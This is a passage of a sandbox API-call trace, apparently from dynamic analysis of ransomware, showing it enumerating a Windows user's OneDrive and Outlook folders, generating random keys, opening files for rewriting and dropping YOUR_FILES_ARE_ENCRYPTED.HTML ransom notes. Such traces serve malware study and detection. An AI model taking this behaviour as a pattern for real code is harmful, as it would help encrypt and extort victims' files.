pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log") returned 97 [0163.332] lstrcmpW (lpString1="2021-02-23_085815_b24-b2c.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.334] PathFindExtensionW (pszPath="2021-02-23_085815_b24-b2c.log") returned=".log" [0163.334] lstrlenW (lpString=".log") returned 4 [0163.334] PathFindExtensionW (pszPath="2021-02-23_085815_b24-b2c.log") returned=".log" [0163.334] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.345] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=15108) returned 1 [0163.345] GetProcessHeap () returned 0x270000 [0163.345] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.346] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="AE") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="01") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="B8") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="03") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="04") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="9A") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="4E") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="97") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="A6") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="EC") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="20") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="A9") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="FF") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="C6") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="2F") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="DE") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="20") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="38") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="C7") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="71") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="04") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="6F") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="E1") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="DC") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="EE") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="F1") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="0E") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="40") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9F") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="48") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="54") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="01") returned 2 [0163.348] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" [0163.348] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.348] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.348] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3cedd50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae850d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3b04, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085815_b24-b2c.log", cAlternateFileName="2021-0~3.LOG")) returned 0 [0163.348] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.348] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0163.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0163.394] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.397] CloseHandle (hObject=0x5b8) returned 1 [0163.397] GetProcessHeap () returned 0x270000 [0163.399] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.399] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 0 [0163.400] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.400] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0163.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.400] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.403] CloseHandle (hObject=0x58c) returned 1 [0163.404] GetProcessHeap () returned 0x270000 [0163.405] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.405] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 0 [0163.405] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.405] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0163.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.414] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.417] CloseHandle (hObject=0x4a8) returned 1 [0163.417] GetProcessHeap () returned 0x270000 [0163.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.419] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Outlook", cAlternateFileName="")) returned 1 [0163.419] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook") returned 55 [0163.419] GetProcessHeap () returned 0x270000 [0163.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.419] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook" [0163.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*" [0163.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.420] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.420] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gliding", cAlternateFileName="")) returned 1 [0163.420] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned 63 [0163.420] GetProcessHeap () returned 0x270000 [0163.420] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.420] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding" [0163.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*" [0163.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.421] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.421] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0163.421] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.421] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0163.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\gliding\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.542] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.546] CloseHandle (hObject=0x58c) returned 1 [0163.546] GetProcessHeap () returned 0x270000 [0163.547] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.547] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf48faf80, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x69a2e4b0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69a2e4b0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x60, cFileName="mapisvc.inf", cAlternateFileName="")) returned 1 [0163.547] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 67 [0163.547] lstrcmpW (lpString1="mapisvc.inf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.547] PathFindExtensionW (pszPath="mapisvc.inf") returned=".inf" [0163.547] lstrlenW (lpString=".inf") returned 4 [0163.547] PathFindExtensionW (pszPath="mapisvc.inf") returned=".inf" [0163.547] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 1 [0163.548] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned 65 [0163.548] GetProcessHeap () returned 0x270000 [0163.548] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.548] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" [0163.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*" [0163.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.550] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.550] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat", cAlternateFileName="STREAM~3.DAT")) returned 1 [0163.550] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned 131 [0163.550] lstrcmpW (lpString1="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.550] PathFindExtensionW (pszPath="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned=".dat" [0163.550] lstrlenW (lpString=".dat") returned 4 [0163.550] PathFindExtensionW (pszPath="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned=".dat" [0163.550] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_availabilityoptions_2_a8c908a0c934b84387dfb81fde9f8fc3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.551] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=422) returned 1 [0163.551] CloseHandle (hObject=0x5b8) returned 1 [0163.551] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", cAlternateFileName="STREAM~2.DAT")) returned 1 [0163.551] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned 120 [0163.551] lstrcmpW (lpString1="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.551] PathFindExtensionW (pszPath="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned=".dat" [0163.552] lstrlenW (lpString=".dat") returned 4 [0163.552] PathFindExtensionW (pszPath="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned=".dat" [0163.552] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_calendar_2_6052b5708c2e614898a26fbe48bfceac.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.552] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=588) returned 1 [0163.552] GetProcessHeap () returned 0x270000 [0163.552] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.557] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C6") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="98") returned 2 [0163.557] wsprintfW 